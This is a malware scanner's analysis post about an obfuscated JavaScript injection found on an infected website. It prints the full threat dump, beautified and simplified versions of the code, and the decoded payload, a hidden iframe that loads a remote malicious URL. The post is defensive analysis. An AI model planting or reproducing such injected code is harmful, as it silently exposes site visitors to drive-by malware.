Malicious hidden redirect to blacklisted website

JavaScript code injects hidden malicious iframe

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website visitor. The malicious iframe downloads content from remote malicious website. This infected website hosts suspicious JavaScript code injected in 3 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Thu Apr 18 12:46:28 2013

Infected website's files: 3

Website malware scan report link: http://goo.gl/cB67f

Website Malware Scanner sitescan report

Malicious iframe injection detection

Threat dump:


[[<script type='text/javascript' language='javascript' >
                                                                                                                                                                                                                                                          p=parseInt;
ss=(123)?String.fromCharCode:0;
asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!71!68!6a!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!71!68!6a!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!74!65!61!6d!72!65!61!63!74!6@!76!65!2e!63!6f!6d!2f!77!70!2d!61!64!6d!6@!6e!2f!63!6c!6@!63!6b!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!71!68!6a!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!71!68!6a!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!71!68!6a!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!71!68!6a!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");
try
{
document.body%26=0.1
}
catch(gdsgsdg)
{
zz=3;
dbshre=10;
if(dbshre)
{
vfvwe=0;
try
{
document;
}
catch(agdsg)
{
vfvwe=1;
}
if(!vfvwe)
{
e=eval;
}
s="";
if(zz)for(i=0;
i-486!=0;
i++)
{
if(window.document)s+=ss(p(asgq[i],16));
}
if(window.document)e(s);
}
}

 </script>]]

Malware entry

Malware entry details.

Beautified script

1. p = parseInt;
2. ss = (123) ? String.fromCharCode : 0;
3. asgq ="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!71!68!6a!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!71!68!6a!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!74!65!61!6d!72!65!61!63!74!6@!76!65!2e!63!6f!6d!2f!77!70!2d!61!64!6d!6@!6e!2f!63!6c!6@!63!6b!65!72!2e!70!68!70!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!71!68!6a!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!71!68!6a!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!71!68!6a!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!71!68!6a!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!71!68!6a!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");
4. try {
5.     document.body % 26 = 0.1
6. } catch (gdsgsdg) {
7.     zz = 3;
8.     dbshre = 10;
9.     if (dbshre) {
10.         vfvwe = 0;
11.         try {
12.             document;
13.         } catch (agdsg) {
14.             vfvwe = 1;
15.         }
16.         if (!vfvwe) {
17.             e = eval;
18.         }
19.         s = "";
20.         if (zz) for (i = 0; i - 486 != 0; i++) {
21.                 if (window.document) s += ss(p(asgq[i], 16));
22.         }
23.         if (window.document) e(s);
24.     }
25. }

Simplified version of JavaScript injection

1. asgq = "28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20...".split("!");
2.  s = "";
3.  for (i = 0; i - 486 != 0; i++) { s += String.fromCharCode(parseInt(asgq[i], 16)); }
4.  eval(s);

Malicious payload

Decoded payload generates hidden iframe to http://www.teamreactive.com/wp-admin/clicker[.]php

Blacklisting status

The website is Suspicious on Google Safe Browsing.

Google Safe Browsing analysis

Malware clean-up

Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.